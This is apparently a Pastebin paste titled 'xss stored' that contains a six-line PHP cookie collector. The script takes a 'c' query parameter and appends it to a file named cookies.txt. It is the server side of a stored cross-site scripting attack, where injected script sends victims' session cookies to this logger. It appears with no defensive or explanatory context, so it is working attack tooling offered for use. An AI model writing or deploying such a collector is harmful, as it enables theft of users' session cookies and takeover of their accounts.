Advertisement
awcerdofkqopekfqe

xss stored

May 27th, 2019
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.12 KB | None | 0 0
  1. <?php
  2. $cookie = $_GET['c'];
  3. $fp = fopen('cookies.txt', 'a+');
  4. fwrite($fp, 'Cookie:' .$cookie.'\r\n');
  5. fclose($fp);
  6. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement